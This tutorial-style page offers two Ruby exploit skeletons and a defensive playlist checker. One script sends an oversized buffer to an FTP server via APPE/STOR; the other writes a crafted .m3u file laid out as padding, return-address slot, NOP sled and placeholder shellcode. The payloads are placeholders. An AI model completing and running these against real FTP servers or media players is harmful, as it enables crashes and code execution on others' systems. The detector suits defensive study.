It's good to have a skeleton exploit that you can quickly edit and use during your exploitation process.
```ruby
#!/usr/bin/env ruby
# KING SABRI | @KINGSABRI
require 'socket'

# Placeholder buffer; edit the size and content per target
buffer = "A" * 2000

#--> Networking
host = ARGV[0]
port = ARGV[1] || 21

s = TCPSocket.open(host, port)
s.recv(1024)                      # read the service banner
puts "[+] Sending Username."
s.send("USER ftp\r\n", 0)
s.recv(1024)
puts "[+] Sending Password."
s.send("PASS ftp\r\n", 0)
s.recv(1024)
puts "[+] Sending Evil buffer..."
s.send("APPE " + buffer + "\r\n", 0)
total = s.send("STOR " + buffer + "\r\n", 0)   # send returns the number of bytes sent

#--> Exploit Info
puts "[+] " + "Total exploit size: " + "#{total} bytes."
puts "[+] " + " Buffer length: " + "#{buffer.size} bytes."
puts "[+] Done"

s.close
```
To execute it
ruby ftp_exploit.rb [TARGET] [PORT]
Note that with some services you have to receive from the socket, and with some you do not.
Creating a simple exploit file
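```ruby
#!/usr/bin/env ruby
# KING SABRI | @KINGSABRI

# Output file name; defaults to exploit.m3u
file = ARGV[0] || "exploit.m3u"

# Placeholder layout: padding, return-address slot, NOP sled, payload slot
junk  = "A" * 2000
eip   = "B" * 4
nops  = "\x90" * 8
shell = "S" * 368
exploit = junk + eip + nops + shell

File.open(file, 'w') {|f| f.write(exploit)}
puts "[*] Exploit size: #{exploit.size}"
```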
To execute it
ruby m3u_exploit.rb song1.m3u
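From the defender's side, a file with this layout looks nothing like a real playlist, which makes it easy to triage. The check below is an added example, not part of the original page; the function name `inspect_playlist` and the thresholds `MAX_LINE` and `MIN_RUN` are assumptions to tune for your environment.

```ruby
#!/usr/bin/env ruby
# Added example: flag playlist files that show the traits of the skeleton
# above (one huge line, long repeated-byte padding, 0x90 bytes).
MAX_LINE = 1024        # assumed upper bound for a legitimate playlist entry
MIN_RUN  = 64          # assumed minimum repeated-byte run worth flagging
NOP      = "\x90".b

# Returns an array of findings; empty means nothing suspicious was seen.
def inspect_playlist(data)
  data = data.b        # work on raw bytes, not encoded text
  findings = []

  # 1. Overlong lines: playlist entries are short paths or URLs.
  data.split(/\r?\n/n).each_with_index do |line, i|
    next unless line.bytesize > MAX_LINE
    findings << "line #{i + 1}: #{line.bytesize} bytes (limit #{MAX_LINE})"
  end

  # 2. Long runs of a single repeated byte (padding such as "A" * 2000).
  data.scan(/((.)\2{#{MIN_RUN - 1},})/mn) do |run, byte|
    offset = Regexp.last_match.begin(0)
    findings << format("run of %d x 0x%02x at offset %d",
                       run.bytesize, byte.ord, offset)
  end

  # 3. 0x90 sequences have no place in a text playlist.
  if (idx = data.index(NOP * 4))
    findings << "NOP-like sequence (0x90 x4+) at offset #{idx}"
  end

  findings
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample with the same layout the skeleton writes.
  sample = "A" * 2000 + "B" * 4 + "\x90" * 8 + "S" * 368
  data = ARGV[0] ? File.binread(ARGV[0]) : sample
  puts inspect_playlist(data)
end
```

Run it with a file path to inspect that file, or with no arguments to see the findings for the constructed sample.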